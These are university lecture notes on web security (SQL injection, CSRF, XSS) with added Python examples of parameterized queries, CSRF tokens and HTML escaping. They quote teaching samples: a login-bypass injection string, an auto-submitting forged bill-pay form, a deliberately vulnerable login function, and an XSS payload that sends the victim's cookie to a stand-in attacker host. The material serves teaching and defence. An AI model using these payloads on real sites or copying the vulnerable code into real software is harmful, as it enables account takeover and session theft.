Lecture 7. Web Application Security. Sunday 10/4/2016

Agenda
- Web Site Vulnerabilities
- SQL Injection
- Cross Site Request Forgery (CSRF)
- Cross-site scripting (XSS)

Three Top Web Site Vulnerabilities
- SQL Injection: browser sends malicious input to server; bad input checking leads to a malicious SQL query
- CSRF (Cross-Site Request Forgery): bad web site sends a browser request to a good web site, using the credentials of an innocent victim
- XSS (Cross-Site Scripting): bad web site sends an innocent victim a script that steals information from an honest web site

Three Top Web Site Vulnerabilities: Attack Goals
- SQL Injection: uses SQL to change the meaning of a database command
- CSRF (Cross-Site Request Forgery): leverage the user's session at the victim server to perform actions
- XSS (Cross-Site Scripting): inject a malicious script into a trusted context

SQL Injection
Basic picture: attacker's malicious code executed on the victim server
[Diagram: (1) Attacker sends input to Victim Server; (2) Victim Server issues an unintended SQL query to the Victim SQL DB; (3) Attacker receives valuable data]

SQL Injection: Database queries with PHP
Sample PHP:

    $recipient = $_POST['recipient'];
    $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
    $rs = $db->executequery($sql);

Problem: what if recipient is a malicious string that changes the meaning of the query?

SQL Injection: CardSystems Attack
- CardSystems: credit card payment processing company
- SQL injection attack in June 2005 put it out of business
The Attack:
- 263,000 credit card #s stolen from database
- credit card #s stored unencrypted
- 43 million credit card #s exposed

SQL Injection: Case Study

    set ok = execute("SELECT * FROM Users WHERE user='" & form("user") & "' AND pwd='" & form("pwd") & "'");
    if not ok.eof
        login success
    else
        fail;

Is this exploitable?

SQL Injection: Normal Query
[Diagram: Web Browser (Client) enters Username & Password; Web Server sends SELECT * FROM Users WHERE user='me' AND pwd='1234' to the DB]

SQL Injection
Suppose user = ' or 1=1 -- (URL encoded). Then the script does:

    ok = execute("SELECT * FROM Users WHERE user='' or 1=1 -- ' AND pwd='...'")

The -- causes the rest of the line to be ignored. Now ok.eof is always false and login succeeds.
The bad news: easy login to many sites this way.

SQL Injection: How to prevent SQL injection attacks
Examples:
- Parameterized statements: rather than embedding user input in the statement text, the statement is written with placeholders and the arguments are passed separately, so they can never change the structure of the query
- Pattern check and sanitize the input: float, integer, Boolean and string parameters can be checked for whether their value is a valid representation of the given type
- Input validation: authenticate user input against a set of defined rules for type, length and syntax, and also against other rules
- Database permissions: restrict the privileges of the account the application connects with
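An added example, not from the lecture slides, of the parameterized-statement and type-check defences above, written in Python against an in-memory SQLite database. It reproduces the case study's login query in the vulnerable string-built form beside the bound-parameter form, so the effect of the ' or 1=1 -- input on each can be compared directly. The Users table and its single row are constructed sample data, and check_int_param is a hypothetical name for the pattern check.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: an in-memory Users table with one account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    db.execute("INSERT INTO Users VALUES ('me', '1234')")
    db.commit()
    return db


def login_vulnerable(db, user, pwd):
    """The case study's query, built by string concatenation (deliberately unsafe)."""
    sql = ("SELECT * FROM Users WHERE user='" + user
           + "' AND pwd='" + pwd + "'")
    # With user = "' or 1=1 --" the WHERE clause becomes
    #   user='' or 1=1 --' AND pwd='...'
    # and the password check is commented out, so any row matches.
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, user, pwd):
    """Same check with bound parameters: the SQL text never changes."""
    sql = "SELECT * FROM Users WHERE user=? AND pwd=?"
    # The driver sends the two values separately from the statement, so a quote
    # or a comment marker inside them is just part of the string being compared.
    return db.execute(sql, (user, pwd)).fetchone() is not None


def check_int_param(value, lo, hi):
    """Pattern check for an integer parameter (hypothetical helper): accept only
    a plain decimal integer inside [lo, hi]; return the int or None."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        return None
    n = int(value)
    return n if lo <= n <= hi else None
```

The same injected value succeeds against login_vulnerable and fails against login_parameterized; the type check rejects anything that is not purely a number, so an injected comparison never reaches the query at all.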

Cross Site Request Forgery: Introduction
[Diagram: what happens when a user visits a target website]

Cross Site Request Forgery (CSRF)
[Diagram: what happens in a CSRF attack?]

Q: how long do you stay logged in to Gmail? Facebook?

Cross Site Request Forgery
Basic picture: attacker site forges a request from the victim browser to the victim server
[Diagram: User (victim browser), Attack Server and Victim Server, steps 1-4]

Cross Site Request Forgery: Example
- User logs in to bank.com; the session cookie remains in browser state as the browser is still open
- User visits another website containing:

    <form name=f action=http://bank.com/billpay.php>
      <input name=recipient value=badguy>
    </form>
    <script> document.f.submit(); </script>

- Browser sends the user's authentication cookie with the request
- Transaction will be fulfilled
Problem: cookie authentication is insufficient when side effects occur

Cross Site Request Forgery: Example (Money transfer)
[Diagram: form post with cookie]

Cross Site Request Forgery: Cookieless Example: Home Router
[Diagram: User, Bad web site and Home router, steps 1-4]

Cross Site Request Forgery: How to prevent CSRF attacks and reduce their threats?
Examples of effective solutions:
- Single per-page nonce: insert a nonce into each form and also into a special slot in the server session; compare the values of these two variables when the form is submitted
- Per-session nonce: to overcome the usability weaknesses of the per-page nonce, a single token is created at the beginning of the session and is used throughout the session
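An added example, not from the slides, of the two nonce schemes above in Python: a per-session token and single-use per-page nonces, both kept in a server-side session slot and compared with the submitted form field using a constant-time comparison. The /billpay.php handler, the in-memory session store and the alice account are constructed for the example, and the session id stands in for the cookie the browser would send; the attacker's forged form is the one on the bank.com slide, which carries no token because the attacker's page cannot read the bank's form.

```python
import hmac
import re
import secrets

# Constructed in-memory session store: session id (the cookie value) -> data.
SESSIONS = {}


def _same(a, b):
    # Constant-time comparison; encode so non-ASCII input cannot raise TypeError.
    return hmac.compare_digest(a.encode(), b.encode())


def create_session(user):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {
        "user": user,
        "csrf_token": secrets.token_urlsafe(32),  # per-session nonce
        "page_nonces": set(),                     # outstanding per-page nonces
    }
    return sid


def issue_page_nonce(sid):
    """Per-page nonce: a fresh value for one form, remembered in the session slot."""
    nonce = secrets.token_urlsafe(32)
    SESSIONS[sid]["page_nonces"].add(nonce)
    return nonce


def consume_page_nonce(sid, submitted):
    """Accept a per-page nonce once, then forget it so it cannot be replayed."""
    nonces = SESSIONS[sid]["page_nonces"]
    match = next((n for n in nonces if _same(n, submitted)), None)
    if match is None:
        return False
    nonces.discard(match)
    return True


def render_billpay_form(sid, per_page=False):
    """The bank's own form carries the token as a hidden field."""
    token = issue_page_nonce(sid) if per_page else SESSIONS[sid]["csrf_token"]
    return ('<form action="/billpay.php" method="post">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="recipient"></form>')


def form_token(html):
    """Pull the hidden token out of rendered form HTML (demo helper)."""
    m = re.search(r'name="csrf_token" value="([^"]+)"', html)
    return m.group(1) if m else ""


def handle_billpay(sid, form, per_page=False):
    """Simulated /billpay.php: sid comes from the cookie, form from the POST body."""
    session = SESSIONS.get(sid)
    if session is None:
        return "not logged in"
    submitted = form.get("csrf_token", "")
    ok = (consume_page_nonce(sid, submitted) if per_page
          else _same(submitted, session["csrf_token"]))
    if not ok:
        return "rejected: missing, wrong or reused CSRF token"
    return "paid " + form["recipient"]


def run_scenario():
    """Walk through the slide's attack with and without a token."""
    sid = create_session("alice")
    forged = {"recipient": "badguy"}  # attacker's form: no token available to it
    legit = {"recipient": "bob",
             "csrf_token": form_token(render_billpay_form(sid))}
    once = {"recipient": "carol",
            "csrf_token": form_token(render_billpay_form(sid, per_page=True))}
    return {
        "forged": handle_billpay(sid, forged),
        "legit": handle_billpay(sid, legit),
        "per_page_first": handle_billpay(sid, once, per_page=True),
        "per_page_replay": handle_billpay(sid, once, per_page=True),
    }
```

The cookie alone still identifies the session in every case; what distinguishes the legitimate submission is the token that only a page served by the bank could have contained. The per-page variant additionally refuses a second submission of the same form, which is the usability cost the slide refers to.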

Cross Site Request Forgery: For User Protection
- Log out: CSRF attacks generally require that the victim be logged into the target website
- Do not save basic authentication credentials
- Change default passwords
- Use different browsers: most CSRF targets require the victim to have an active session on the website in order for the attack to work
- Use a virtual machine: use dedicated browser virtual machines (VMs), configured with a minimal OS and a web browser
- Enforcement via proxies: enforce the use of different browsers for visiting different classes of sites by using proxy servers and configuring the proxy settings on users' browsers

Cross Site Scripting (XSS)
Basic scenario: attacker's malicious code executed on the victim browser
[Diagram: Attack Server, Victim client and Victim Server, steps 1-5]

Cross Site Scripting (XSS): XSS example: vulnerable website
Search field on victim.com:

    http://victim.com/search.php?term=apple

Server-side implementation of search.php:

    <HTML>
    <TITLE> Search Results </TITLE>
    <BODY>
    Results for <?php echo $_GET['term'] ?> :
    ...
    </BODY>
    </HTML>

The search term is echoed into the response unchanged.

Cross Site Scripting (XSS)
Consider the link (properly URL encoded):

    http://victim.com/search.php?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>

What if the user clicks on this link?
1. Browser goes to victim.com/search.php
2. victim.com returns <HTML> Results for <script> ... </script>
3. Browser executes the script: sends badguy.com the cookie for victim.com

Cross Site Scripting (XSS)
[Diagram: Attack Server (www.attacker.com) supplies the link http://victim.com/search.php?term=<script>...</script>; the Victim client requests it from the Victim Server (www.victim.com), which returns <html> Results for <script> window.open(http://attacker.com?... document.cookie...) </script> </html>]

Cross Site Scripting (XSS): What is XSS?
An XSS vulnerability is present when an attacker can inject scripting code (e.g., JavaScript) into pages generated by a web application.
Methods for injecting malicious code:
- Reflected XSS (type 1): the attack script is reflected back to the user as part of a page from the victim site
- Stored XSS (type 2): the attacker stores the malicious code in a resource managed by the web application, such as a database
- Others, such as DOM-based attacks (type 0 XSS): malicious data are reflected by the JavaScript code, fully on the victim client/user side

Cross Site Scripting (XSS)
Basic scenario: reflected XSS attack (email version)
[Diagram: Attack Server, User/Victim and Victim Server, steps 1-5]

Cross Site Scripting (XSS): 2006 Example Vulnerability
- Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website
- Injected code redirected PayPal visitors to a page warning users their accounts had been compromised
- Victims were then redirected to a phishing site and prompted to enter sensitive financial data

Cross Site Scripting (XSS): Stored XSS
[Diagram: Attack Server injects a malicious script, which the Victim Server stores; the User/Victim later downloads it]

Cross Site Scripting (XSS): Stored XSS using images
Suppose pic.jpg on the web server contains HTML! A request for http://site.com/pic.jpg results in:

    HTTP/1.1 200 OK
    Content-Type: image/jpeg

    <html> fooled ya </html>

The browser will render this as HTML (despite the Content-Type).
Consider photo sharing sites that support image uploads: what if an attacker uploads an image that is a script?

Cross Site Scripting (XSS): The best way to protect against XSS attacks
- Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters)
- Do not attempt to identify active content (i.e., interactive website content) and remove, filter, or sanitize it: there are too many types of active content and too many ways of encoding it to get around filters for such content
- Adopt a positive security policy that specifies what is allowed; negative or attack-signature-based policies are difficult to maintain and are likely to be incomplete
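An added example, not part of the slides, of the positive-policy advice above applied to the search.php page from the XSS example, in Python: the term is first checked against an allowlist pattern describing what a search term may contain, and whatever is echoed is HTML-encoded so the browser can only render it as text. handle_search, TERM_PATTERN and the other names are chosen for this example, and the allowlist is a deliberately strict assumption that a real site would widen to its own needs.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Positive policy (an assumption for this example): a search term is 1-64
# letters, digits, spaces or hyphens. Anything else is rejected outright,
# rather than trying to spot and strip "active content" inside it.
TERM_PATTERN = re.compile(r"[A-Za-z0-9 -]{1,64}")

PAGE = ("<HTML><TITLE> Search Results </TITLE><BODY>"
        "Results for {} :...</BODY></HTML>")


def search_page_vulnerable(term):
    """search.php as on the slide: the term is echoed unchanged."""
    return PAGE.format(term)


def search_page_escaped(term):
    """Output encoding: <, >, &, and quotes become entities, so a term is
    rendered as text inside the page and never as markup."""
    return PAGE.format(html.escape(term, quote=True))


def validate_term(term):
    """Allowlist check: True only if the whole term matches the policy."""
    return TERM_PATTERN.fullmatch(term) is not None


def make_search_url(term):
    """Build a properly URL-encoded search link (demo helper)."""
    return "http://victim.com/search.php?" + urlencode({"term": term})


def handle_search(url):
    """Simulated server side: parse the query string, apply the positive
    policy, then render with escaping. Returns (body, HTTP status)."""
    term = parse_qs(urlsplit(url).query).get("term", [""])[0]
    if not validate_term(term):
        return "<HTML><BODY>Invalid search term</BODY></HTML>", 400
    return search_page_escaped(term), 200


# The slide's payload, constructed here only to show what each version does with it.
PAYLOAD = "<script>window.open('http://badguy.com?cookie='+document.cookie)</script>"
```

Both layers are kept on purpose: the allowlist stops the request early and gives a clear error, and the escaping guarantees that even a term the policy lets through (or a later relaxation of the policy) cannot be interpreted as a script tag by the browser.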

Complex problems in social network sites
- User data
- User-supplied applications: some social networking sites allow users to build and upload their own applications; if applications are unrestricted JavaScript that runs in the user's browser, then the JavaScript from an application could read user information, act as the user or do other malicious actions